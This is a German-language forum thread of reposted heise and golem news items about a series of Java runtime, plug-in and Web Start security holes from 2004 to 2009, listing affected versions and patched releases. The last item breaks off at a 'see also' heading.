-
Eine schwere Sicherheitslücke haben die Sicherheitsexperten von iDefense in der Plug-In-Architektur der Java 2 Runtime Environment Standard Edition (JRE) entdeckt, die es Angreifern gestattet, auf einem fremden Rechner beliebigen Programmcode auszuführen. Sun bietet bereits eine Version an, die das Sicherheitsloch in der Java-Engine schließt und so Windows- und Linux-Systeme gegen entsprechende Attacken schützt. Außerdem wurde eine weniger gefährliche Sicherheitsanfälligkeit in der Java-Implementierung von Opera entdeckt.
Wie die Sicherheitsexperten von iDefense in einem Security Bulletin berichten, gestattet ein Sicherheitsloch in der Plug-In-Architektur der Java Engine, die Sicherheitseinschränkungen der Java-Sandbox zu umgehen. So lässt sich über JavaScript-Kommandos eine "unsafe class" laden, was normalerweise über ein Java-Applet nicht möglich sein sollte.
Das versetzt einen Angreifer in die Lage, beliebigen Programmcode über bösartige Java-Applets auf fremde Systeme zu schleusen, beliebige Daten von einem solchen System zu laden oder auf das Netzwerk eines anderen Nutzers zuzugreifen. Da sich Programmcode mit den Rechten des Nutzers ausführen lässt, verhilft das zu einer weit reichenden Kontrolle über das entsprechende System. Ein Opfer muss nur dazu gebracht werden, ein entsprechendes Java-Applet in einem der betroffenen Browser zu laden, zu denen der Internet Explorer, Mozilla und Firefox zählen, wobei Letztere sowohl auf der Windows- als auch auf der Linux-Plattform angreifbar sind. Nach Ansicht von iDefense könnte ein Angreifer einen plattformunabhängigen Exploit schreiben, der sowohl unter Windows als auch unter Linux für einen Angriff genutzt werden kann.
Das Sicherheitsloch wurde für die Java 2 Platform Standard Edition (J2SE) 1.4.2_01 und 1.4.2_04 bestätigt, könnte aber auch in früheren Versionen der Java-Engine stecken. Sun bietet mit der J2SE 1.4.2_06 bereits eine aktuelle Version kostenlos zum Download an, in der der Fehler behoben wurde.
http://java.sun.com/j2se/1.4.2/download.html
Die aktuelle Opera-Version 7.54 ist von diesem Problem nicht betroffen, weil Opera - im Unterschied zu den anderen Web-Browsern - die Java-Funktionen nicht über die Plug-In-Technik einbindet, sondern sich für eine andere Methode entschieden hat. In dieser wurde dafür eine andere, als weniger gefährlich eingestufte Sicherheitsanfälligkeit gefunden, worüber Angreifer Angaben zum Home-Verzeichnis sowie den Java-Installationspfad auslesen können. Außerdem lässt sich darüber Opera gezielt zum Absturz bringen.
Der Fehler wurde für Opera 7.54 bestätigt, dürfte sich aber auch in früheren Opera-Versionen wiederfinden. Derzeit bietet Opera keine aktuelle Final-Version an, die den Fehler behebt. Nur in der Vorabversion von Opera 7.60 wurde das Problem beseitigt; eine Final-Version von Opera 7.60 wird für Ende des Jahres erwartet.
Quelle : www.golem.de
-
Kleiner Hinweis für die Firefox-Nutzer unter uns:
Leider verrät Firefox nicht direkt die Version der verwendeten Java-Version.
Das reine Vorhandensein einer Sun JRE ist an dem Menueeintrag "Extras" --> "DOM-Inspector" zu erkennen. Zumindest bei mir führt nämlich die Nachfrage über "Systemsteuerung" --> "Java Plug-in" unter "Browser" zu einem Fehler beim Versuch, Firefox dort als "Mozilla 1.1 oder höher" anzusprechen, eigentlich kein Wunder.
Welche Version im Browser tatsächlich genutzt wird, ist einfach über folgende Webseite abfragbar:
http://www.java.com/en/download/help/testvm.jsp
Den dort auch gezeigten Text "You are using an older version..." finde ich im Zusammenhang mit der hier installierten 1.4.2_06 allerdings etwas unpassend...
-
heise Security hat auf dem c't-Browsercheck einen Test eingebaut, der das gestern gemeldete Sicherheitsproblem in Suns Java-Plugins überprüft. Durch einen Fehler kann JavaScript-Code auf sicherheitsrelevante Methoden eines Java-Applets zugreifen. Damit könnte ein Applet aus der Sandbox ausbrechen und beispielsweise Dateien überschreiben oder lesen und übers Netz versenden.
Sun hat den Fehler zwar in Version 1.4.2_06 beseitigt und stellt diese Version als Java Runtime Environment (JRE) für Windows, Linux und Solaris zum Download bereit. Doch unglücklicherweise sind auf diversen Sun-Seiten -- unter anderem der deutschen Download-Seite -- noch ältere Versionen verlinkt, die den Fehler noch enthalten. Die JRE 1.5 -- auch als Standard Edition 5.0 bezeichnet -- ist nicht von dem Problem betroffen.
Das unter Linux sehr beliebte Java der Blackdown-Gruppe wies den Fehler ebenfalls auf. Die Entwickler haben ihn in Version 1.4.2_01 behoben und ein eigenes Advisory veröffentlicht. Unerfahrene Linux-Anwender sollten jedoch besser warten, bis ihr Distributor aktualisierte Java-Pakete bereitstellt.
Der Test auf dem Browsercheck versucht, via JavaScript eine harmlose, aber eigentlich gesperrte Methode eines aktiven Java-Applets anzusprechen. Gelingt dies, ist das Java-Plugin verwundbar und der Test liefert eine dementsprechende Meldung.
Update:
Opera verwendet eine grundsätzlich andere Methode, um JavaScript und Java zu verbinden. Deshalb liefert der Test unter Opera falsche Ergebnisse. Allerdings lässt sich der Fehler laut Jouko Pynnonen grundsätzlich auch unter Opera ausnutzen, sodass Opera-Anwender eine aktuelle Java-Version ab 1.4.2_06 installieren sollten.
Siehe dazu auch:
* Java-Test auf dem c't-Browsercheck
Quelle und Links:
http://www.heise.de/newsticker/meldung/53582
-
Sun behebt weiteres Sicherheitsloch in Java-Virtual-Machine
Suns Java-Plug-In für den Internet Explorer weist eine schwere Sicherheitslücke auf, die es Angreifern erlaubt, beliebigen Programmcode auf einem fremden Rechner auszuführen. Bereitgestellte Updates sollen das Sicherheitsloch schließen und ein weiteres Leck in Suns Java-Virtual-Machine stopfen, das einem Java-Applet gestattet, ein anderes Applet ohne entsprechende Berechtigungen zu beeinflussen.
Das von Fujitsu entdeckte Sicherheitsleck im Java-Plug-In für den Internet Explorer erlaubt es einem Angreifer, über JavaScript Java-Klassen zu laden, auf die normalerweise nur die Java-Virtual-Machine Zugriff hat. Somit lässt sich beliebiger Programmcode auf einen fremden Rechner ausführen, womit sich ein Angreifer eine umfassende Kontrolle über das System verschaffen kann. Aber auch das Lesen und Schreiben von lokalen Dateien ist so möglich.
Für das SDK und JRE bietet Sun die Versionen 1.4.2_01 und 1.3.1_13 zum Download an, welche das Sicherheitsloch beseitigen.
In der Java Virtual Machine für Windows, Linux und Solaris wurde ein weiteres Sicherheitsloch entdeckt, worüber ein Java-Applet ein anderes Applet beeinflussen kann, ohne dass die eigentlich erforderlichen Berechtigungen vorliegen. Das Sicherheitsleck wurde ebenfalls im SDK und JRE ab den Versionen 1.4.2_06 und 1.3.1_13 behoben; entsprechende Updates stehen zum Download bereit.
http://sunsolve.sun.com/search/document.do?assetkey=1-26-57708-1 (http://sunsolve.sun.com/search/document.do?assetkey=1-26-57708-1)
Sowohl das JDK als auch das JRE 5.0 weisen keine der beiden Sicherheitslücken auf.
Quelle : www.golem.de
-
Eine Schwachstelle in Suns Java Web Start gefährdet die Sicherheit von PCs. Bereits durch den Besuch einer präparierten Web-Seite kann das System mit Schädlingen infiziert werden. Web Start ist eine Technik, mit deren Hilfe sich Java-Anwendungen sehr leicht über Web-Server verteilen und über einen Browser aufrufen lassen. Sie ist Bestandteil der Java-Laufzeitumgebung (JRE).
Durch einen Fehler im Web Start Launcher können Java-Anwendungen ihre Zugriffsrechte auf ein System erhöhen und sich beispielsweise selbst Lese- und Schreibrechte gewähren oder bereits auf dem PC vorhandene andere Programme starten. Normalerweise sollte die Sandbox dies bei nicht vertrauenswürdigen Java-Anwendungen verhindern. Aufgrund der Lücke im Launcher kann ein Angreifer mit manipulierten JNLP-Dateien aber eigene Befehle an die Java Virtual Machine übergeben und so die Sandbox abschalten.
Betroffen ist Java Web Start unter Windows, Solaris und Linux in allen Versionen 1.4.2 der Java 2 Platform Standard Edition (J2SE) bis einschließlich 1.4.2_06. Nicht betroffen sind J2SE 5.0 und J2SE vor Version 1.4.2. Die Lücke ist unabhängig vom eingesetzten Browser (Internet Explorer, Firefox und Mozilla), nur Opera ist nicht betroffen, da er standardmäßig nicht mit JNLP-Dateien verknüpft ist. Der Internet Explorer öffnet JNLP-Dateien automatisch, andere Browser fragen per Dialog nach, ob die Datei geöffnet oder gespeichert werden soll.
Sun hat den Fehler in J2SE 1.4.2_07 behoben. Alternativ können Anwender ihr System auch gleich auf J2SE 5.0 Update 2 heben. In vielen Web-Start-Installationen ist die automatische Aktualisierung aktiv, hier genügt es, dem Update zuzustimmen. Als Workaround schlägt der Hersteller vor, den Start von Java-Web-Start-Anwendungen durch den Browser zu deaktivieren. Ein Anleitung dazu hat Sun in seinem Advisory veröffentlicht. Da sich die Anwendungen auch über die Kommandozeile starten lassen, empfiehlt Sun zusätzlich, den Launcher (javaws.exe unter Windows und javaws unter Solaris und Linux) umzubenennen, um den unerwünschten Aufruf zu verhindern.
Quelle und Links : http://www.heise.de/newsticker/meldung/57730
-
Sun hat für seinen Java System Web Proxy Server ein Update veröffentlicht, um einen Buffer Overflow zu beseitigen. Nach Angaben des Herstellers kann ein Angreifer den Fehler über das Netzwerk ausnutzen, um Code einzuschleusen. Der sollte sich allerdings nur mit eingeschränkten Rechten starten lassen, da der Server standardmäßig mit den User-Rechten "Nobody" installiert wird.
Unter Umständen stürzt der Server bei einer Attacke auch ab. Nähere Angaben macht Sun zu der Schwachstelle nicht. Betroffen sind die Versionen 3.6 bis einschließlich Service Pack 6 auf allen unterstützten Betriebssystemen. In Service Pack 7 ist der Fehler beseitigt.
Bereits vergangene Woche musste Sun Updates veröffentlichen, um Lücken im Java System Web Server (ehemals Sun ONE Web Server und iPlanet Web Server) und Sun ONE/Java System Directory Server zu schließen.
Quelle und Links : http://www.heise.de/security/news/meldung/58814
-
Anwender, auf deren Systemen Suns Java Runtime Environment oder Java Web Start läuft, sollten schleunigst ein Update installieren. Durch eine kritische Sicherheitslücke können manipulierte "untrusted" Applets und JLNP-Dateien die Sicherheitsrestriktionen umgehen und auf beliebige Dateien lesend und schreibend zugreifen. Auch das Starten bereits anderer installierter Anwendungen ist möglich.
Web-Server können den PC so beim Aufruf einer Seite mit Schadcode infizieren. Die Zugriffe erfolgen jeweils im Kontext des angemeldeten Anwenders. Nähere Angaben macht Sun zu den Lücken nicht. Eine ähnlich kritische Lücke in Web Start gab es bereits im März dieses Jahres.
Betroffen sind diesmal Java 2 Platform, Standard Edition(J2SE) 5.0 und 5.0 Update 1 für Windows, Solaris und Linux, J2SE 1.4.2_07 und vorhergehende Versionen für Windows, Solaris and Linux sowie Java Web Start in Java 2 Platform Standard Edition (J2SE) 5.0 und 5.0 Update 1 für Windows, Solaris and Linux. Nicht betroffen sind sämtliche J2SE 1.3.1_xx-Versionen, Java Web Start vor 5.0 und Java Web Start 1.0.1_02 einschließlich der vorhergehenden Versionen.
Der Hersteller hat für Web Start und die Runtime Environment die Version 5.0 Update 2 veröffentlicht, um die Lücke zu schließen. Für den 1.4.2-Zweig behebt J2SE 1.4.2_08 das Problem. Alternativ können Anwender die Lücke in Web Start auch beheben, indem sie die Verknüpfung mit JNLP-Dateien lösen. Wie man das macht, beschreibt Sun in dem Advisory Security Vulnerability With Java Web Start.
Quelle und Links : http://www.heise.de/newsticker/meldung/60615
-
Suns Java System Web Proxy Server, ein in Java programmierter Web-Proxy zur Reduktion der benötigten Internet-Bandbreite, enthält drei Schwachstellen, die einen Denial-of-Service aus dem Internet ermöglichen. Das Ausnutzen der Lücken führt dazu, dass der Server keine Anfragen mehr beantwortet.
Betroffen ist laut Sun die Version 3.6 bis einschließlich Service-Pack 7 des Web-Cache, und zwar sowohl unter Unix als auch auf Windows-Systemen. Sun schließt die Lücken mit einem neuen Service-Pack und stellt die aktualisierten Versionen auf seiner Homepage zum Download zur Verfügung.
Details zu den Lücken nennt Sun wie üblich nicht.
Siehe dazu auch:
* Security Advisory von Sun
* Download von Suns Java-Proxy 3.6 Service Pack 8
Quelle und Links : http://www.heise.de/newsticker/meldung/63849
-
Der Hersteller Sun meldet fünf kritische Sicherheitslücken in älteren Versionen seiner Java-Laufzeitumgebung (Java Run-Time Environment, JRE), mit der untrusted Applets aus der Sandbox ausbrechen und die Kontrolle über den Rechner erlangen können. Eine präparierte Seite kann auf diese Weise den Rechner mit Schadcode infizieren, sofern Suns Java installiert ist. Anwender sollten ihre Version überprüfen und gegebenenfalls aktualisieren.
Drei der Fehler (Bug-IDs 6263857, 6277266 und 6277659) treten bei Verwendung so genannter Reflection APIs auf, ein weiterer Fehler (Bug 6268876) steckt in den Java Management Extensions (JMX). Ein anderer Fehler (6243400) scheint allgemeinerer Natur zu sein. Sun macht zu den Schwachstellen aber keine weiteren Angaben. Die Fehler sind über diverse Versionen der JRE, JDK und SDK verteilt und finden sich sowohl unter Windows und Solaris als auch Linux. Betroffen sind:
BugID 6243400: JDK/JRE 5.0 Update 3
BugID 6268876: JDK/JRE 5.0 Update 3
BugID 6263857: SDK/JRE 1.3.1_15, 1.4.2_08, JDK/JRE 5.0 Update 3
BugID 6277266: SDK/JRE 1.4.2_08, JDK/JRE 5.0 Update 3
BugID 6277659: SDK/JRE 1.4.2_08, JDK/JRE 5.0 Update 3
(jeweils einschließlich dieser und den vorhergehenden Versionen)
Der Hersteller empfiehlt auf JDK und JRE 5.0 Update 4, J2SE 5.0 beziehungsweise SDK und JRE 1.4.2_09 zu aktualiseren. Derzeit stehen bereits JDK und JRE 5.0 Update 5 sowie SDK und JRE 1.4.2_10 zum Download bereit.
Siehe dazu auch:
* Security Vulnerabilities in the Java Runtime Environment Advisory von Sun
* Security Vulnerability With Java Management Extensions in the Java Runtime Environment Advisory von Sun
* Security Vulnerabilities in the Java Runtime Environment 2 Advisory von Sun
Quelle und Links : http://www.heise.de/newsticker/meldung/66770
-
Die Ende November in Suns Java-Laufzeitumgebung (JRE) gemeldeten kritischen Sicherheitslücken finden sich teilweise auch in der Implementation von IBM. Die insgesamt drei in einem IBM-Advisory genannten Schwachstellen ermöglichen beispielsweise Java-Applets in manipulierten Web-Seiten unerlaubte Systemzugriffe und das Einschleusen von beliebigem Schadcode.
WebSphere-Server seien davon nicht betroffen, da sie nur "trusted Applets" verarbeiten, heißt es in dem Advisory. IBM macht keine genauen Angaben zu den betroffenen Versionen, verweist jedoch auf die gefixten SDK-Versionen der Serie 1.4.2 und 1.3.1 für Windows, Linux, Solaris und HP-UX. Ein Upgrade ist dringend zu empfehlen.
Siehe dazu auch:
* Java Reflection API privilege escalation vulnerability, Advisory von IBM
* Sun meldet kritische Sicherheitslücken in Java-Laufzeitumgebung, Artikel auf heise Security
Quelle und Links : http://www.heise.de/security/news/meldung/67476
-
Durch mehrere Sicherheitslücken in den Entwicklungs- und Laufzeitumgebungen von Suns Java-Implementierung können sich nicht vertrauenswürdige Applets über ihre Zugriffsrestriktionen hinwegsetzen und vollen Zugang zum Dateisystem mit den Rechten des ausführenden Nutzers erlangen. Der Hersteller veröffentlichte einige Wochen nach Herausgabe aktualisierter Versionen nun entsprechende Advisories. Demnach betreffen die Probleme sämtliche Versionen des Software Development Kits (SDK) und des Java Runtime Environments (JRE) der Serien 1.3 und 1.4, die Laufzeitumgebung Java 2 Standard Edition (J2SE) und das Java Development Kit (JDK) der aktuellen Serie 5.0 unter Windows, Solaris und Linux.
Sieben der Fehler befinden sich in der so genannten Reflection-API, mit der Java-Applikationen beispielsweise für Debugging-Zwecke Zugriff auf interne Klassen und Strukturen der ausführenden virtuellen Maschine erhalten. Eine weitere Schwachstelle, die ebenfalls vollen Dateizugriff mit Nutzerrechten ermöglicht, befindet sich in Java Web Start, das als Teil aktueller Laufzeitumgebungen die Ausführung und Verwaltung von Java-Applets erleichtert. Die genannten Probleme wurden in JDK und JRE 5.0 Update 6 sowie in den älteren SDKs und JREs der Versionen 1.4.2_10 und 1.3.1_17 behoben.
Die installierte Java-Version lässt sich mit dem Kommandozeilenbefehl java -fullversion bestimmen. Liefert der Befehl beispielsweise die Ausgabe 1.5.0_06-b05, so wurde bereits die aktuelle Version 5.0 Update 6 eingespielt. Durch den beliebigen lesenden und schreibenden Dateizugriff mit Benutzerrechten können Java-Applets von manipulierten Websites oder in E-Mails beispielsweise vertrauliche Benutzerdaten auslesen oder Hintertüren auf den betroffenen Systemen öffnen, die sich für weitere Angriffe nutzen lassen. Sun empfiehlt daher allen Anwendern ein umgehendes Upgrade auf eine fehlerbereinigte Version. Wie die Erfahrung bei älteren Java-Problemen zeigt, könnten die weit verbreiteten Implementierungen von Blackdown und IBM die Schwachstellen ebenfalls enthalten.
Siehe dazu auch:
* Security Vulnerabilities in the Java Runtime Environment may Allow an Untrusted Applet to Elevate its Privileges, Advisory von Sun
* Security Vulnerability With Java Web Start, Advisory von Sun
Quelle und Links : http://www.heise.de/security/news/meldung/69356
-
Sicherheit ist ein Prozess – die Binse gilt auch bei Suns Java: Nutzer, die noch das Java Runtime Environment der Version 5.0 Update 5 sowie ältere Ausführungen des Browser-Plug-ins und von Java Web Start einsetzen, sollten ihre Software nun doch einmal aktualisieren. Neuere Versionen des Browser-Plug-ins und von Web Start beheben eine Lücke, über die Applets und Anwendungen beim Aufruf ein noch auf dem System vorhandenes, nicht gepatchtes Java Runtime Environment (JRE) starten können.
Durch diesen Fehler wird das System auch wieder anfällig für ältere Schwachstellen. Suns Sicherheitswarnung gilt nicht nur für Windows-Anwender, auch Linux- und Solaris-Anwender müssen die aktuelle JRE-Version 8 einspielen und alle älteren Varianten löschen. Details listet Sun in seiner Alert Notification.
http://java.sun.com/javase/downloads/index.jsp
Quelle : www.heise.de
-
Sun weist in einer Sicherheitswarnung auf eine Schwachstelle in JDK und JRE 5.0 hin, durch die nicht vertrauenswürdige Applets auf die Daten anderer Applets zugreifen können. Insbesondere wenn der Anwender gerade mehrere Webseiten besucht, die Applets benutzen, könnten Angreifer über einen manipulierten Webserver Informationen ausspähen. Beispielsweise nutzen einige Banken Java-Applets für HBCI.
Laut Sun beruht das Problem auf einem Fehler in der Swing-Bibliothek der Java Runtime Environment (JRE) und ist dort bis einschließlich Update 7 für Solaris, Linux und Window zu finden. Ab Update 8 ist der Fehler beseitigt, aktuell ist mittlerweile bereits Update 9. Anwender sollten ihre Java-Version überprüfen und gegebenenfalls aktualisieren – auch wenn das automatische Java-Update standardmäßig im Hintergrund mitläuft, zeigt sich oft, dass die Version nicht auf dem neuesten Stand ist. Mit java -version lässt sich die benutzte Version anzeigen.
Da Java-Updates in der Regel eine vollständig neue Version installieren, ohne die vorherige zu löschen, müssen die alten verwundbaren Versionen per Hand gelöscht werden. SDK und JRE 1.4.2_xx und vorherige sowie 1.3.1_xx und vorherige sind nicht betroffen.
Siehe dazu auch:
* # A Security Vulnerability in the Java Runtime Environment Swing Library may Allow an Untrusted Applet to Access Data in Other Applets, Fehlerbericht von Sun
Quelle und Links : http://www.heise.de/security/news/meldung/81122
-
Sun rückt mit einiger Verspätung Details zu Lücken in Java heraus, die bereits in JDK 5.0 Version 9 geschlossen wurden. Verfügbar ist allerdings seit kurzem schon Update 10. Sun bleibt damit seiner Strategie treu, auf Fehler erst dann hinzuweisen, wenn die Software mindestens mit einer Versionsnummer höher als bei der fehlerbereinigten Version verfügbar ist.
Unter anderem sind zwei Buffer Overflows im Java Runtime Environment (JRE) beseitigt, über die nicht vertrauenswürdige Applets Zugriff auf Systemresourcen erhielten konnten und etwa beliebige Dateien mit den Rechten des Anwenders lesen, schreiben und ausführen konnten. Zwei weitere Fehler in der Serialisierung der JRE führten ebenfalls dazu, dass ein Applet seine Rechte erhöhen konnte. Schließlich ist es über zwei Schwachstellen möglich, dass ein Applet auf die Daten eines anderen Applets zugreifen kann. Die Fehler sind auch in den DK- und JRE-Versionen bis 1.4.2_12 zu finden, teilweise auch bis 1.3.1_18. Hierfür stehen ebenfalls Updates (1.4.2_13 und 1.3.1_19) bereit.
Wer noch nicht auf die aktuellen Versionen aktualisiert hat, sollte die Warnungen von Sun nun zum Anlass nehmen. Zu beachten ist allerdings, dass Java-Updates in der Regel eine vollständig neue Version installieren, ohne die vorherige zu löschen. Anwender müssen die alten verwundbaren Versionen also per Hand deinstallieren.
Siehe dazu auch:
* Security Vulnerabilities Related to Serialization in the Java Runtime Environment may Allow Untrusted Applets to Elevate Privileges, Fehlerbericht von Sun
* Security Vulnerabilities in the Java Runtime Environment may Allow an Untrusted Applet to Access Data in Other Applets, Fehlerbericht von Sun
* Security Vulnerabilities in the Java Runtime Environment may Allow Untrusted Applets to Elevate Privileges and Execute Arbitrary Code, Fehlerbericht von Sun
Quelle und Links : http://www.heise.de/security/news/meldung/82796
-
Ein Fehler in der Java Virtual Machine von Sun lässt sich ausnutzen, um über präparierte GIF-Bilder Code auf ein System zu schleusen und auszuführen. Nach Angaben der Zero Day Initiative (ZDI) provoziert ein GIF-Bild mit der Breite 0 in einem Image-Block einen Überlauf, was zu diversen fehlerhaften Pointern führt. Wenigstens einer davon lässt sich laut Fehlerbericht missbrauchen, um den Speicher gezielt zu manipulieren. Darüber kann ein nicht vertrauenswürdiges Applet seine Privilegien erhöhen, um Zugriff auf sämtliche Ressourcen des Systems zu erhalten. Ein Anwender muss allerdings eine bösartige Webseite besuchen, um angegriffen zu werden. In der Regel genügt es dem Angreifer oftmals aber schon, dem Opfer einen vermeintlich interessanten Link per Mail zu schicken, um dies zu erreichen.
Betroffen sind JDK und JRE 5.0 Update 9 und vorhergehende, SDK und JRE 1.4.2_12 sowie vorhergehende und SDK und JRE 1.3.1_18 sowie frühere Versionen auf Windows, Solaris und Linux. In den seit Ende Dezember verfügbaren Versionen JDK/JRE 5.0 Update 10, SDK/JRE 1.4.2_13 und SDK/JRE 1.3.1_19 sind die Fehler behoben. Zu beachten ist, dass Java-Updates in der Regel eine vollständig neue Version installieren, ohne die vorherige zu löschen. Anwender müssen die alten verwundbaren Versionen also per Hand deinstallieren.
Siehe dazu auch:
* Security Vulnerability in Processing GIF Images in the Java Runtime Environment May Allow an Untrusted Applet to Elevate Privileges, Fehlerbericht von Sun
* Sun Microsystems Java GIF File Parsing Memory Corruption Vulnerability, Fehlerbericht von ZDI
Quelle und Links : http://www.heise.de/newsticker/meldung/83811
-
In der Java-Laufzeitumgebung (JRE) von Sun sowie in der zugehörigen Entwicklungsumgebung (JDK beziehungsweise SDK) wurden zwei wesentliche Sicherheitsmängel entdeckt. Laut einem Hersteller-Advisory handelt es sich um zwei Schwachstellen in den Bildverarbeitungsroutinen, durch die nicht vertrauenswürdige Java-Applets unter Umständen zum einen unerlaubten Zugriff auf Anwenderdateien erhalten und beliebige Programme ausführen und zum anderen die Java-VM zum Absturz bringen können (Denial-of-Service). Betroffen von beiden Problemen sind die neueste Java-Version 6 sowie alle Vorgängerversionen auf allen Betriebssystemplattformen.
In den Versionen 6 Update 1 und 5.0 Update 11 hat Sun beide Fehler behoben. Version 1.3.1_20 behebt lediglich das Denial-of-Service-Problem. Anwender einer 1.3er-Version sollten ohnehin auf eine neuere Version aktualisieren. Für die in Entwicklerkreisen aus Stabilitätsgründen noch weit verbreitete Java-Version 1.4 stehen indes noch Updates für beide Schwachstellen aus. In der derzeit aktuellen Version 1.4.2_14 sind beide Lücken noch offen. Möglicherweise enthalten auch andere Java-Implementierungen die Fehler, etwa von IBM und Blackdown, da sie auf Sun-Java basieren. Von deren Herstellern liegen noch keine Fehlermeldungen vor.
Siehe dazu auch:
* Security Vulnerabilities in the Java Runtime Environment Image Parsing Code may Allow a Untrusted Applet to Elevate Privileges, Advisory von Sun
* Suns JDK führt Code aus Bildern aus, Meldung auf heise Security
Quelle und Links : http://www.heise.de/security/news/meldung/90514
-
Als Sun vergangene Woche Java 1.6 Update 2 veröffentlicht hat, war noch unklar, ob und welche Sicherheitslücken die neue Version geschlossen hat. Inzwischen haben Sicherheitsdienstleister und Sun erste Meldungen herausgegeben, in denen sie Informationen zu den behobenen Fehlern liefern.
Der Sicherheitsdienstleister eEye erörtert in einer Sicherheitsmeldung, dass Java Web Start (javaws.exe) beim Verarbeiten von präparierten JNLP-Dateien patzt. In der Folge tritt ein Pufferüberlauf auf und eingeschleuster Programmcode kann zur Ausführung gelangen. Das Java Network Launching Protocol (JNLP) beschreibt vom Server ausgelieferte XML-Dateien, die Informationen über eine Java-Anwendung wie Ablageort der JAR-Datei, Parameter für den Aufruf oder auch die Hauptklasse der Anwendung enthalten. Der Fehler beruht darauf, dass Web Start das codebase-Attribut einer JNLP-Datei in einen Puffer fester Größe kopiert, ohne vorher die Länge des Wertes zu prüfen.
In einer Fehlermeldung erläutert Sun, dass XSLT-Stylesheets in digitalen Signaturen von XML-Dateien nicht korrekt verarbeitet werden. In der Folge kann fremder Programmcode mit den Rechten der Anwendung zur Ausführung kommen, die die XML-Datei verarbeitet. Bei XSLT-Stylesheets handelt es sich um Regelwerke, nach denen XML-Daten in unterschiedliche Ausgabeformate umformatiert werden können. Der Fehler kann auf Suns Java System Application Server und Web Server zur kompletten Übernahme des Systems durch Angreifer führen. Betroffen sind Java 1.6 Update 1 und ältere Versionen.
Sun beschreibt in einem weiteren Fehlerbericht eine Denial-of-Service-Schwachstelle in Java. Die Java Secure Socket Extension (JSSE) verarbeitet SSL/TLS-Verbindungsaushandlungen nicht korrekt. Ein Server, der JSSE für SSL/TLS-Unterstützung nutzt und im Netz auf eingehende verschlüsselte Verbindungen lauscht, könnte durch manipulierte Anfragen komplett zum Stillstand kommen. Der Fehler betrifft die Java-Versionen 1.6 Update 1 und vorherige Fassungen, 5.0 Update 11 und frühere Versionen sowie Java 1.4.14 und ältere.
Java-Anwender sollten so bald wie möglich auf die aktuellen Versionen umsteigen. Sun stellt als aktuelle Versionen 1.6 Update 2, 1.5 Update 12 und 1.4.2 Update 15 zum Download bereit.
Siehe dazu auch:
* Sun Java WebStart JNLP Stack Buffer Overflow Vulnerability, Sicherheitsmeldung von eEye
* Java Runtime Environment Does Not Securely Process XSLT Stylesheets Contained in XML Signatures, Fehlermeldung von Sun
* Java Secure Socket Extension Does Not Correctly Process SSL/TLS Handshake Requests Resulting in a Denial of Service (DoS) Condition, Fehlerbericht von Sun
Quelle und Links : http://www.heise.de/security/news/meldung/92537
-
Sun hat in vier Fehlerberichten auf Schwachstellen und Sicherheitslücken im Java Runtime Environment (JRE) hingewiesen. Durch einen Fehler im Applet Caching kann ein "untrusted" Applet Netzwerkverbindungen nicht nur zu dem Server aufbauen, von dem es heruntergeladen wurde, sondern auch zu anderen Systemen beziehungsweise Servern. Normalerweise erlauben dies die Sicherheitsrichtlinien von Java nicht. Des Weiteren kann ein nicht vertrauenswürdiges Applet ein derart großes Fenster öffnen, dass Warnmeldungen des JRE überdeckt werden. Betrüger könnten damit versuchen, Anwendern bestimmte Inhalte als vertrauenswürdig vorzugaukeln.
Zudem soll ein bösartiges Applet per Drag & Drop Zugriff auf ein System erhalten können. Dazu muss es allerdings nach Darstellung von Sun einen Anwender überzeugen, Dateien aus dem Applet-Fenster auf eine Anwendung zu ziehen, die Schreibrechte auf dem System besitzt.
Die genannten drei Schwachstellen finden sich in JDK und JRE 6 Update 2 und frühere, JDK und JRE 5.0 Update 12 und frühere, SDK und JRE 1.4.2_15 und vorhergehende, sowie SDK und JRE 1.3.1_20 und frühere. Die Fehler sind ab JDK und JRE 6 Update 3, JDK und JRE 5.0 Update 13 und SDK und JRE 1.4.2_16 behoben. Für SDK und JRE 1.3.1 soll die Version 1.3.1_21 demnächst erscheinen.
Darüber hinaus berichtet Sun von drei Lücken in Java Web Start, durch die ein Applet Zugriff auf lokale Dateien und Anwendungen erhält. Alle drei Fehler sind in den oben genannten Versionen zu finden, allerdings nicht jeder Fehler in jeder Version. Einzig SDK und JRE 1.3.1 sind nicht verwundbar – dort gibt es noch kein Web Start. Die Lücken sind ebenfalls in den aktuellen Java-Fassungen behoben. Zu beachten ist, dass Java-Updates in der Regel eine vollständig neue Version installieren, ohne die vorherige zu löschen. Anwender müssen die alten verwundbaren Versionen also per Hand deinstallieren.
Siehe dazu auch:
* Security Vulnerability in Java Runtime Environment With Applet Caching May Allow Network Access Restrictions to be Circumvented, Fehlerbericht von Sun
* Java Runtime Environment (JRE) May Allow Untrusted Applets or Applications to Display An Oversized Window so that the Warning Banner is Not Visible to User, Fehlerbericht von Sun
* Multiple Security Vulnerabilities in Java Web Start Relating to Local File Access, Fehlerbericht von Sun
* An Untrusted Java Web Start Application or Java Applet May Move or Copy Arbitrary Files by Requesting the User to Drag and Drop a File from Application or Applet Window to a Desktop Application, Fehlerbericht von Sun
Quelle und Links : http://www.heise.de/newsticker/meldung/96935
-
Sun hat das Update 4 für Java 6 veröffentlicht, das rund 370 Fehler beheben soll. Einige davon sind auch sicherheitsrelevant. Zwar veröffentlicht Sun Details zu Lücken in Java in der Regel erst Monate später, im Changelog wird aber immerhin ein Stack Overflow in der Klasse sun.font.TrueTypeFont.getTableBuffer erwähnt.
Des Weiteren wurden mehrere Fehler behoben, die zu Abstürzen führen können. Unklar ist allerdings, ob sich damit auch etwa ein auf Java basierender Server aus der Ferne beeinträchtigen lässt. Anwender sollten die neue Version möglichst bald installieren.
Quelle : www.heise.de
-
Sun warnt vor eine Sicherheitslücke in der Java-Laufzeitumgebung JRE. Aufgrund eines Fehlers in unpack200, dem Entpacker für Java-Archive, können Angreifer mit Hilfe manipulierter JAR-Dateien beliebigen Schadcode auf Anwender-Rechner schleusen und im Kontext des Nutzers ausführen lassen. Dies kann unter Umständen bereits beim Aufruf einer manipulierten Webseite geschehen.
Der Fehler befindet sich in Java JDK und JRE Version 5.0 Update 17 und 6 Update 12 sowie den Vorgängerversionen der beiden Serien auf Windows, Linux und Solaris. Der Hersteller weist allerdings ausdrücklich darauf hin, dass die Versionen 1.4.2 und 1.3.1 nicht betroffen sind.
Die installierte Java-Version lässt sich mit dem Kommandozeilenbefehl java -version abfragen. Unter Firefox liefert die Eingabe von about:config in die Adresszeile die Information; IE-Nutzer können eine spezielle Hersteller-Webseite aufrufen. Betroffene Anwender sollten möglichst bald auf die fehlerbereinigten Versionen 5 Update 18, 6 Update 13 oder eine Folgeversion aktualisieren.
Siehe dazu auch:
